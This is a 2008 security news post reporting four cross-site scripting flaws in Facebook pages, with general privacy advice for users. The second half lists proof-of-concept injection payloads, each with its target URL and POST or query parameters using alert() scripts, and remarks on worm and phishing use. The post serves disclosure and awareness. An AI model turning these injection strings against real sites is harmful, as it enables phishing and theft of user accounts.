New highly critical Facebook XSS vulnerabilities pose serious privacy risksWritten by DPMonday, 15 December 2008Facebook users are susceptible to phishing attacks and ID theft due to some new highly critical cross-site scripting vulnerabilities.
Security researchers Zeitjak, David Wharton, Daimon and p3lo, have recently discovered XSS flaws that affect several Facebook functionalities including the developers page, new users registration page, iphone login page and applications page.
Malicious people can exploit these XSS bugs to infect millions of Facebook members with malware, adware and spyware.
It is also very safe not to accept friend invitations from people you don't know. The reason is that a Facebook profile contains enough personal information which can be studied by fraudsters (your unknown friends) in order to create special phishing attacks or malware targeted to individual users or businesses. What if you click on a shared link or item? Then your privacy will belong to them!!!
So with the keywords security and privacy in mind, do use appropriately safe your social networking profile. Always question suspicious requests and notify them to the security staff.
Facebook staff usually fixes such flaws promptly.
Latest critical Facebook XSS:
XSS #1 with POST (by Zeitjak) | Mirror:
http://www.new.facebook.com/r.php
POST: reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar
XSS #2 with POST (by David Wharton) | Mirror:
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
POST:
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
XSS #3 (by DaiMon) | Mirror:
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
This one works on another IP (67.228.87.82) and can't be used for a worm, except a phishing one.
XSS #4 with POST (by p3lo) | Mirror:
http://developers.facebook.com/tools.php?fbml
POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
|